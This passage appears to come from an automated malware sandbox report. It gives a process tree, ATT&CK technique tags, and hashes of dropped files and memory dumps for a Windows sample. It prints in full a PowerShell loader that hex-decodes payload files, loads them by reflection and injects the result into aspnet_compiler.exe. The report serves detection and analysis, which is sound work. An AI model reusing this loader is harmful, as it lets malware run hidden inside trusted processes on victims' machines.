6⤵
PID:4388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"
7⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
PID:2224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
8⤵
PID:4900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
8⤵
PID:2380

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1018B

MD5
cdcc9f199b9e3268b059be1c0cf80d0f

SHA1
7508523cd3fbce1ecec39af5876cfe728f013c88

SHA256
7a9a04ee141e8239b409942e7546b846b0e1d3030cc322799b91c0c80a7ae12b

SHA512
89eaa985a7c3edebde1612b045e0c95b2f8ea480325b333e83c192d0f52056544742d676ae5242637374eae12c45e3061fe67e2cb274a488a51120cca3ba254f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
747B

MD5
7c0fd0a2dc598e3b8a06c56fbde7bbe9

SHA1
f4f39d2e24d5379b63b75c7d30afc12f770ea083

SHA256
25aca030e176f1ab460fc9040567ceab9181575734d45949cc57b82bb2a8ac3b

SHA512
a01e2f16f6ced0ad6f2e1c8bf3d9bc6200bfcbbcd67f1c1978ba838ad6a78ca83d7bce765181e84fa9b370da27fde10ff08a90f8c4cb70051bf8152037630523

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
c381b744e3d9a5ec9d4d09b4d972c49a

SHA1
4dca627a6ac6004f65eb71d64904649e05d486a3

SHA256
ac4b99782d098afd476a88b65337d1c4267531b69a6c665c76d7c487e4b1f96a

SHA512
5c9bede70d5ec03cabf4459eb9119e4fdd71573cd0183cfbab28debf0dbadb8cdcf7e04ed85b6f837ebc384a808e9527e15cd0caba048ff3f8ea5206fba0ab94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
35099f5a0dea3a9e5e3f1e042da48f88

SHA1
3997e136748c265e734c82b19cbbdb1bf52ecba4

SHA256
c54b4b60d27688545db2c4718e01342d29bd836fdc60f43671586bfbdcc0b68d

SHA512
2f58c8b49841b31dfa2d8035822834de36858fd7b1dab4780fcebe55346faa7c724580d8211ef56edf92802dde985d4dbb55ee9178a317a7f369c2af8e06a145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
bc5216937975888ff7d4a7c3b0509a47

SHA1
eb2a3383836130396389727a6d1a7f2f690c0c49

SHA256
ece1ca4e5c739d38e71a0811b6d41008b6b28a3a4607a29714cb26ac4a9bc87a

SHA512
6940eaa4188a7b7c39f51a3db5f6bde19cebe00f30edf2f4d83927354f45a080f91425061cbf00a1f0d7d7cbe0a01d6bf2cc5137c49de09fc6a0b88ed46d90ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
136KB

MD5
a9c6361325231d94f5da1c10aaf64389

SHA1
11c72105cff5d5c08b7a6985d0bc9a2ca454dbc1

SHA256
89e95969c7a849dac0457205f033a8a6fe03fbe542098e5f34c2526aaf966079

SHA512
285ce23be54b9a84bd6bd8462d91ccdfd78a8bd23cd61bfc9e11e40ed27a5674662e5d15866c7f318ec1251391c24cc9f6ffd2eba18a5b0c19af770367730f71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
109KB

MD5
935faa42939107f0a1382b588035c31d

SHA1
d02c20eeaeb98f4715dbc63d6502593aa28fdd9d

SHA256
60604896355dfce3de4b8d5d318cc8dcfeb71a3b5aef69a88ad2fb8676379661

SHA512
7eadd362f8fa54767a8cd38a60a86348c1a3530a185c9c466eac32aeee3554ab47de36df06aab3bb39874f6c43db0f101ea1b5256afdd4fd24ed0e305cb9fab6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57dacf.TMP
Filesize
105KB

MD5
d1b2f573cedfe89db18eb406648b30ae

SHA1
2b842d2e247b0dab238f36df626c885ab7a0e6e9

SHA256
6c651c97b325ba76aeff40259d3508385372f2fbb70827c3789e605de18b40e3

SHA512
7551255e87dbe94385a1ed4379a667d79e38bad8f6ce331040bada68eaa376e99eef7b80d6226ceb91d5e5641f337a82a450d4cc57fdf6c4f7a2b635369cbc8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f2108c6102695c98776af4054746d5fe

SHA1
d3cf36e2811d16166a4d7c1fd57092aeea3e70ee

SHA256
0b05f88ebf4574ba03e74ab24a6a7ecfa4d0e0efc97333b5025d9029898d0e6b

SHA512
25339dc69e4ac52167e28bca77fa5c7a521866c004711213cae199b8b81341bafce0aa250b70021d81fb4459db7cf0d2d1f39d1b48018dcc1d1124ae08439de8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
Filesize
425B

MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
dd024c522f9a1b587dd363b85e06293d

SHA1
6b976d7de873d08d3c6be887deec98b978f563b6

SHA256
316620c6de225029a3beb86ff3885b61d260d8fb23496d130a8d563fbd919bbf

SHA512
02c6b6cfe7ea89bf134e87d57239b8092a6ef3ac93fad89d676362ad9fa60758a11a01698c0d6862be2d4a11d27dc9c44a386c5705ab1286928ff4c7f6756eb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OHP8MVFQ\vb[1].txt
Filesize
827B

MD5
15674634b70ae2a7a7089e39fa0f7e17

SHA1
0fb3e5d4ccda5862f76c428aa633ce5adae09959

SHA256
2e8f43983d4e2dbb66f792c4dc38ab0848e43ae414a22bc9f3d498c9ab19c148

SHA512
374c43ca66e0dcb4c2bf93d6134904d323b23c9c8f7a8991253c754ad8046349abc500d7d450f2814a1a7d5d220f3060a9799010f990a53281a1d8322d167f6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
5eaff4ab49c18915d6341b82cc702e82

SHA1
e1a8ef47acf6ba6ae3c6e983b0dc728a1f2a5917

SHA256
2ee1bd282f1305e092efb1f202712fd2363b8d303f2b8eae9e3e8fddec7503a9

SHA512
5b5a537b9f3241e90d760752bcabfb275e953b44409eefbc843b8a0febc9606dba40156e11ba4b92a560e32fd9791110738ea29f5a96e91058b4cf8dd74bd551

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
0d59d711268150bf08eb64ea74fa17d4

SHA1
c65423446193114716176dbfcb24c2cb330e9520

SHA256
50848e5455bf128fb8508e3189399dd361c3135a65d8bad64e994573920b8542

SHA512
345de5796311486aa1ef5119380f5a4c1f07cdb9a0f270298837dadb564a87079202a1a98bb8b9170568306c96c2c073b596e584d7fd751c2cae460c782fa190

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
26d88b440d9d0e8033a3c13697357122

SHA1
96e0a7a97273ae71ce5fa943dbd31d0fd2a9d3da

SHA256
e6c80dd7fa8c961356f3206a61d7fa28098e8ec39282c4fff3dc9a70764b20bf

SHA512
51ec67f000dfe45b079218331945220e0a40e757960232466b1733a11117d85b28a5c9c8fb3ba5967d3e6c15ed3398fdeb6dbbbe4887bf102cda0a9b7ba9847b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1f4eb69a29be3935e3b12f7780ee1e11

SHA1
b0e0dc61c62622cc3430a9013bda3781dfbac93f

SHA256
7fdfbd42dce3963e84221035af7371e32a9752281878051fc1a005dad0af3ec2

SHA512
774daba0bb7d482c463f09a19fdf7c4bcd43262a046833110f1b4c45466765a86703dc32f6aaea5ae93df3e4a5ba36a63f0ae7627e2af35efd79a537af3e9876

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
a64bda64ce721b9fe27626a7a53f1234

SHA1
d754ec7d2b2a97732dbac148ad1847729e104066

SHA256
f1586f142033f82464f3bcfc722da2c2c6d81cce1ddf33fdf58e9304775aee3e

SHA512
d893566cecb50081c5a474304c8a14a01659e81b571b97172bab6eef8d499f615a0dc398882ee79267388d638370c51656bd2634332f40cf66c5d1f5271adc0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
ee95808f0d2e23aa39f3f4b7f0945f87

SHA1
6c945f9f9d7cea7ba6574a421d34d892da26d854

SHA256
bced12db99aa901e86cdd13a33f1f92f0cf05faef9e6c450bb60d50a31579725

SHA512
5bdbae84def4d16fefd6349c7aa6dfb7bf8bde85ddf1c3f9344c8f47eb89e7f6c6f58eef0cfd62bd294d668567ef50e1ded0c2f634e0e852311649790e2e9258

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
35396e0976df62853bf2d30ff6eda631

SHA1
6fb9d1ebd61016182ff77731586b0233ad882632

SHA256
91ca09a52f17bc102ca366f046061e703546af0f6f9387410292ffd71d3ee493

SHA512
5d7824c8d6e8aeadd2a899a70b01a5be85673a056ae6f78d6d30dda6abaa7f5eca786b7d278243a4e9b6f75151cc4c646e5ba70a9a4119c8b99c09b984f28d94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
e3db37ef63e91cb245a0f68f0d8394c2

SHA1
bb22b650615bcb7bdbaecd19bcfc54528abf7c49

SHA256
ec2c48fdb0a933d5ad7565e0457b8213c8330c9dd73b56968822f69e695df468

SHA512
94d461a42d6c08c7b05f2bb5ee0e62082cdb6a1930ed1afdbc4d88df12c8597ed8f4c96aceeb83bb5da848d63466c2650bbae568d6ae2dfd71f829c5b85c43a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
b81e9d05947fea89e7ddcce801c1a064

SHA1
b79ad46e40e705999d294362baca93728982caf2

SHA256
1d529dd75d78765d9890654ea2f1708c8ddec634a7de80f3721a0d3e7169f381

SHA512
fa1ca56a7315b869fff824fde98c39937a057e69f646eea5c824ab1dd17da32362e9ef9bf29259f021b3f5cbdcdd58aab0c60abac32ed87e9851e29426b8c08b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
61950731b6bd9511614ad795ecfb33e1

SHA1
1c2230e00a8173f6c0353400fd743a79201721d1

SHA256
708adc90c38c7c693e780a5752b9f8de580938a135c1e6e41b7b2a6a82b730e0

SHA512
bbdc0727d584401e8387f530c6946501bca4756d6d24a925e113ceba20b49871db4146dedfff1e1a8b04c6f01c4fd68561694f98a41a45c85eea0aad59bffae5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
75ad7a5dc2124781720d48c8d7484c28

SHA1
523bb4cac760528505a0f2641fae260e8e8eb6e3

SHA256
0f679acc4d440f4ac3daec2d533b41743af9700fd7b81fe6aa7ce945e901eb50

SHA512
10c5dc0b354fcef6d7697fdc75c2729c6c9bb8a449ae72933c00b83cac045dc5725099a48b3d9a5417a5bd95e39a0900ca02ab5139f0a391f381b64c3060fed7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
eb0fac3c8ec0783e07e40c31c99c9bb9

SHA1
aaf578891080c383f488505e070e9505b6c01b19

SHA256
8ab4d1bbe88706c5af34d2501f8ce83506c14bac752f211185a27af4d55b83f7

SHA512
3d3c690b55f1679771482a2f25c23bce4881c6335c53216fb217e18a61729d8738a719a2aa3ef8730af186986257a239092de744dc28eb583bd195230af5a85b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4592161628543166a5aff8a22a043bd1

SHA1
3657888f08f280165401d5332d7a9e10a51a1eb0

SHA256
0062e53922aa973897493e841356b3bb554cd9da97475bf71b5746267373a660

SHA512
de474dd4dd56eb5bede88ffed249c1c02594f0dc4dcbb00eafbebb0cba6fa0476576ce7867cd365f91038d1c86ca30422d905c7e353d20cb2bac373eb51fade8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
2aa407b625b0ee4836081451c0699304

SHA1
fa714bf168447d03037b977675d84a2e40b4fde9

SHA256
33d12777c7b6ebf7f1273a9d9d5b67dc9bf03c3e7aa82817afe0dd0781a501ae

SHA512
a747837080a87b9df9361daed0dd2aaad7b4ccbea860eeec50b51ea971f84469dbfc5c73be7eaf4dd47bdbc5627f4fecf0229241b3b2d4cc4e1414ec6473df61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
49284e913a442a1f5abb01fb8908b882

SHA1
1da4ca65a9865d63d8179f3b892239e71d09fe69

SHA256
9a411b496aaf3e3a2aac97a8d123bd89e28add3233f906a64c6e613fca9ee522

SHA512
f661a40cdf6191d5eb94212b9aad5a01d10307dbfbc2c6ca46e26967783590c0a887ae6759c716fdfaa4e7586155485c252d63658f96c41f4bf66170769120d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
4195abb0ed4482cfa6b989df29cca400

SHA1
79de7f14cb478e4e45d45b091cad67f4f7c19f7a

SHA256
720544fa9ea94a850db97e5ec154122e92baef7742d1527f52639b1e4d07162e

SHA512
02b8f9a82ad7eb116e89b4d52b23d9e1c1491190a65bba434f0a57aae38285e7bc551bc3d184c194750d848e8133fbb6a08c4dbac6bea839812051f6367b5154

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
3ae1d9a4be62f0180efdfa7d914c68c2

SHA1
9f94dc1d1c21fe541fa0393de58609da569fa56d

SHA256
92e06c329e0edb1caab8301bc25587c83cdad4cd2bac2867a118216f587c2227

SHA512
4914d38c284294eaeaa58638b5f9bcee8a33a314d85520364c4abfe2ac10fac3a659d1811f606d4d6cf897fdcebfa4a761f92b60a8f68dea02033b5f166a1d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8fe79d896819eadd2f3e1e6276908faa

SHA1
30a6867b9671b23e56e05a884029742a9d7e220b

SHA256
403187ae805e9c1acfb561d1e0ebfa697cbd848470785e10970994016a8e38f1

SHA512
bf9c8d21a274241179d349cd35cf4293d9e914d16a0386980eb1508629a3397f773ce2c59500fdef66fe377fce0b0e29b1f2910535fcf0115fc4394bae4ec1ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
f0d0dbade46b6ae98c878f449f3c2d85

SHA1
2587ef82fe9ae580e773a1255014297249fbbac2

SHA256
0462afe1dffb3e21cc3821fe3b92249f19db7dc51267aed93f7b83e5847760ca

SHA512
ecb6e074e8622b51770b1811c85d0afaf3330ce8ec2fad66fe63065ed56891f514a5a62891e2ee677a7d8c66ff7bf78456c3414ab97d7d92965dc2d18002ca21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
07a5fbb68125d987909d513d084f9535

SHA1
93e28a876ba5026afb1ccc8abcd3c5a02dcf0a11

SHA256
51c74bd675736588b9916ce8df2212f6a68729f996ca2fa0a3fb3ed8950b4c96

SHA512
c12abaee0cfbffe8cabd697e889e0a90be08e44801904fa0330f2ed13e5ac1970c11ae9e623b0454e74f34195f41489f813378a6720a1a37a678ee01bd4aa9c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
660c71d371faf04f0d58261805259eff

SHA1
a5fd5af628d82691bb8583cfbd86ad47e5fb401e

SHA256
32d48a6ec7edc9b407dddd5b9b2448258b3b1e0a1ec5f913bef409bf8c21296b

SHA512
90ce439dfc965ca37bf7039c1dd73687ff510e235bc208a6aff14cf2daf6870013527397cc68a169b9a2adff1abbffd4c825092f2e23317ab6d145ea8ce79db9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsdhm5wo.elc.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Public\Auto.vbs
Filesize
435B

MD5
a5b25c095336368b68172d0eec88069e

SHA1
47b0b0a229e14d2125feb81c5168a7cf83b04fd1

SHA256
47d7c3b0b2b75fabf29d3b17fa4fa9d0290b26aa5d79ecb875075930e8320a5d

SHA512
c3f49848734b04d7863e1dca88a000b30e41dcbebb2867046e5957e52b93e7cb49cf4f235fb58bd698aa9a2831af5570bdfa4b44d37d7f86e66d577c0f3b29cf

Download Submit
C:\Users\Public\AutoHotkey
Filesize
339B

MD5
2312ab36e3363bfa8f217c14354aba68

SHA1
736c5cb239a94007863c03c68705b890fd051302

SHA256
c53105c99521502a13e4dd32fa591a52b4b35026c68de86aa34f68532ff94769

SHA512
dcd58e38538b9aee53fa4d9b51e563e4e42bf9c7763d2094261b3de11dd21617bcb4bb8c39f86da9409c84b2b0e52a17a56a4aa1c832a0df47201576fd91860b

Download Submit
C:\Users\Public\AutoHotkey.exe
Filesize
774KB

MD5
e63e2669a293c1a6709c373f208a48cf

SHA1
489957991f7c59ec748fb4951fa0b2dd676c8998

SHA256
b740b8ea604a8b6ee1864353cfbbcd6778187486cc408d750c7a1a93bc6a0a0c

SHA512
82655f6110ffd9fcca1572b593ad0bef51974da5a18bdecc79ee88f8d56e14157b5349fadac4f27a8df4e6537165415acb6670fa0c453c5131d67d2500b5dde9

Download Submit
C:\Users\Public\Execute.txt
Filesize
7B

MD5
40cd014b7b6251e3a22e6a45a73a64e1

SHA1
6ea36ce8d4940505e9a2c8fea5db868cd8b3d440

SHA256
e3a67d9540e9a204f7dc4aa9d44a0ec652856cfa932a21196bf9df23aa0e4cd1

SHA512
776d4496cc76782961d66f235ff257567e12e85b950101247fb29de911a4e44048398932f2881b5610cbad6c90fe1c4e99f346cc7d315d7b9a612c89b19b42ea

Download Submit
C:\Users\Public\Gettype.txt
Filesize
7B

MD5
9221b7b54ed96de7281d31f8ae35be6a

SHA1
223fad426aa8c753546501b0643ee1720b57bff0

SHA256
8eab5c7c6d1116d28014f0da7b7e78b9857da1e6f951b903f2a714fc6d3c790a

SHA512
be37de186628a2c30698a6d4826ec5f8845e7b69317b2f044e86fae615c263a5fd179fcbc50821c85b49c9e3e71adb10a947060312da281418c8ca231d656d5d

Download Submit
C:\Users\Public\Invoke.txt
Filesize
6B

MD5
5fb833d20ef9f93596f4117a81523536

SHA1
d6aa1f3a789f3f3108666e0ac807ca5ca7dc5fa5

SHA256
e77f5b9f691679ef6fa67d3ec953199b1696cf6a0e77741c035f11aadfd9bf73

SHA512
afaec35da2440502779227d9436570db82e1f5d86c90662eae82564d717407518d4e1181e024566e2d8d6029bd4e738b9ba4a3108753a8d0d0c98934db94ba35

Download Submit
C:\Users\Public\NewPE2.txt
Filesize
9B

MD5
8a56a0e23dbfe7a50c5ec927b73ec5f2

SHA1
abebd513e68e63e7ec6ae56327c232b6e444ce0a

SHA256
3b348b38ac24e5e26423cc6d46936e7a4fdedda9d4aa89fdb2cfde4fad662cc1

SHA512
276fc17efa7fef658167a94f22c76ae2abb6768d40702a39f970f196099058139249b8e12f18569f7f42f03f581f2543e49f39ab41553dd38d85511558a77ed2

Download Submit
C:\Users\Public\getMethod.txt
Filesize
9B

MD5
db37f91f128a82062af0f39f649ea122

SHA1
f21110ae7ac7cde74e7aa59b22ed10bace35b06b

SHA256
e53ba77fa1dbcb1cc3beed1344f6ae7b182d6a2e2a09bb32ec0d4474978e4a32

SHA512
681c5c69acba8c2b327afd0bcb1062fb5f6ee3231e6b95f4cd97ecd768879250eb81d36b1e1640554a85002a7b2b099acfe7f59f70884f10afd51d372583d3ae

Download Submit
C:\Users\Public\load.txt
Filesize
4B

MD5
ec4d1eb36b22d19728e9d1d23ca84d1c

SHA1
5dbc716c4600097b85b9e51d6aeb77a4363b03ed

SHA256
0cf67fc72b3c86c7a454f6d86b43ed245a8e491d0e5288d4da8c7ff43a7bcdb0

SHA512
d67f0ffb682d7a13510ec5d3e643889d43bc7593429f806fd882b2c72c05a530c2462d332d4293015f33397cdec84c53d1eea58a7bebaab5504153729df02700

Download Submit
C:\Users\Public\msg.txt
Filesize
823KB

MD5
149dc2d54015d59ede29c15507b17b15

SHA1
876252f6bcdc985230657b40900deed96d499602

SHA256
bf192fdbd437dc8b262e9fc17343deed62fc26bf6ef103eaf5ca2a5587c66c8d

SHA512
320890f679bf4959a0b75c43f554eb997656ea6bbbc93782c22e028ea500dd889974de4964f8ee9fa033c0d7e4d54e322f0b9d53051df0bc2d06c77359f91464

Download Submit
C:\Users\Public\node.bat
Filesize
692B

MD5
93f5c544ac2529f4049534fa5d045a84

SHA1
c3531d381ed5ee24d1ad72a30349df5b3d145dff

SHA256
e31dda67e8c311f420cdaf6032298638c89136aad6495a37911c65ec04841557

SHA512
255cdec1780546ab4c2235386604120a3759a692ca102051e1610b3a54d539073edae2a76c210475e4549688767a9708f5851b330afc223cbf048f15b939f06c

Download Submit
C:\Users\Public\run.js
Filesize
1KB

MD5
660c9112523248048eaf7d9f1ee30960

SHA1
3126188624a0299d3821ae3dd6411b4905ecfd0b

SHA256
81b60a632098a246910c001762b65d85e8c00ac88be7a38529e41bdd9ae51093

SHA512
effb1eb00acda9d51bb6de63604d96cb780a6e76e57fe48d67878089c894773ea41209060e7213e3f92d337e24e7f83a7ede6535bd84920d69af1a3e8d37e6e2

Download Submit
C:\Users\Public\runpe.txt
Filesize
3.8MB

MD5
afcc7cacf140469b858eaaca175fd3da

SHA1
5a0e7a65c86dbe0263f895397df93d4fd54d2ae8

SHA256
d09d8cbd5d77f224f31ff616d8c41e0202269092225e646464df3b42ff39a7ad

SHA512
7385fca6a5223bc9f0658fed6673a4547b1340c1b2160d6417e28a9f1da1998b2ce836620877f16a78a54db26f9538936dffc19c9c023db37a4912ade5b2bf18

Download Submit
memory/424-1825-0x000001EBEEB10000-0x000001EBEEB32000-memory.dmp

Filesize
136KB

Download
memory/748-1361-0x0000000037500000-0x0000000037501000-memory.dmp

Filesize
4KB

Download
memory/1364-1002-0x0000000009100000-0x0000000009112000-memory.dmp

Filesize
72KB

Download
memory/1364-885-0x0000000006DF0000-0x0000000006E0C000-memory.dmp

Filesize
112KB

Download
memory/1364-876-0x0000000001150000-0x0000000001186000-memory.dmp

Filesize
216KB

Download
memory/1364-877-0x0000000006E30000-0x0000000007458000-memory.dmp

Filesize
6.2MB

Download
memory/1364-969-0x0000000009050000-0x0000000009070000-memory.dmp

Filesize
128KB

Download
memory/1364-928-0x00000000094F0000-0x00000000099EE000-memory.dmp

Filesize
5.0MB

Download
memory/1364-878-0x0000000006A30000-0x0000000006A52000-memory.dmp

Filesize
136KB

Download
memory/1364-927-0x0000000008F20000-0x0000000008F42000-memory.dmp

Filesize
136KB

Download
memory/1364-926-0x0000000008ED0000-0x0000000008EEA000-memory.dmp

Filesize
104KB

Download
memory/1364-925-0x0000000008F50000-0x0000000008FE4000-memory.dmp

Filesize
592KB

Download
memory/1364-920-0x0000000008DB0000-0x0000000008E55000-memory.dmp

Filesize
660KB

Download
memory/1364-915-0x0000000008C40000-0x0000000008C5E000-memory.dmp

Filesize
120KB

Download
memory/1364-914-0x000000006FD30000-0x000000006FD7B000-memory.dmp

Filesize
300KB

Download
memory/1364-881-0x0000000006BD0000-0x0000000006C36000-memory.dmp

Filesize
408KB

Download
memory/1364-882-0x0000000006C40000-0x0000000006CA6000-memory.dmp

Filesize
408KB

Download
memory/1364-883-0x0000000007560000-0x00000000078B0000-memory.dmp

Filesize
3.3MB

Download
memory/1364-913-0x0000000008C80000-0x0000000008CB3000-memory.dmp

Filesize
204KB

Download
memory/1364-887-0x0000000007B40000-0x0000000007BB6000-memory.dmp

Filesize
472KB

Download
memory/1364-886-0x00000000078D0000-0x000000000791B000-memory.dmp

Filesize
300KB

Download
memory/1376-1711-0x0000000015A00000-0x0000000015A01000-memory.dmp

Filesize
4KB

Download
memory/2636-1351-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2844-1365-0x00000000080C0000-0x0000000008410000-memory.dmp

Filesize
3.3MB

Download
memory/2844-1367-0x00000000089D0000-0x0000000008A1B000-memory.dmp

Filesize
300KB

Download
memory/3472-390-0x0000019C3E020000-0x0000019C3E02A000-memory.dmp

Filesize
40KB

Download
memory/3472-377-0x0000019C3E040000-0x0000019C3E052000-memory.dmp

Filesize
72KB

Download
memory/4092-55-0x000001ED370B0000-0x000001ED370D2000-memory.dmp

Filesize
136KB

Download
memory/4092-58-0x000001ED4F780000-0x000001ED4F7F6000-memory.dmp

Filesize
472KB

Download
memory/4092-135-0x000001ED370E0000-0x000001ED37102000-memory.dmp

Filesize
136KB

Download
memory/4092-174-0x000001ED4F740000-0x000001ED4F752000-memory.dmp

Filesize
72KB

Download
memory/4144-2267-0x000000000E600000-0x000000000E601000-memory.dmp

Filesize
4KB

Download
memory/4148-1174-0x000000006FD30000-0x000000006FD7B000-memory.dmp

Filesize
300KB

Download
memory/4220-1270-0x0000000037B00000-0x0000000037B01000-memory.dmp

Filesize
4KB

Download
memory/4220-1269-0x0000000007800000-0x0000000007801000-memory.dmp

Filesize
4KB

Download
memory/4688-1717-0x0000000008360000-0x00000000083AB000-memory.dmp

Filesize
300KB

Download
memory/4688-1715-0x0000000007E10000-0x0000000008160000-memory.dmp

Filesize
3.3MB

Download
memory/5000-1340-0x000000000AEC0000-0x000000000B538000-memory.dmp

Filesize
6.5MB

Download
memory/5000-1347-0x0000000008F10000-0x0000000008F62000-memory.dmp

Filesize
328KB

Download
memory/5000-1349-0x0000000009160000-0x00000000091FC000-memory.dmp

Filesize
624KB

Download
memory/5004-1675-0x00000000098E0000-0x0000000009900000-memory.dmp

Filesize
128KB

Download
memory/5004-1630-0x0000000009640000-0x00000000096E5000-memory.dmp

Filesize
660KB

Download
memory/5004-1625-0x000000006F810000-0x000000006F85B000-memory.dmp

Filesize
300KB

Download
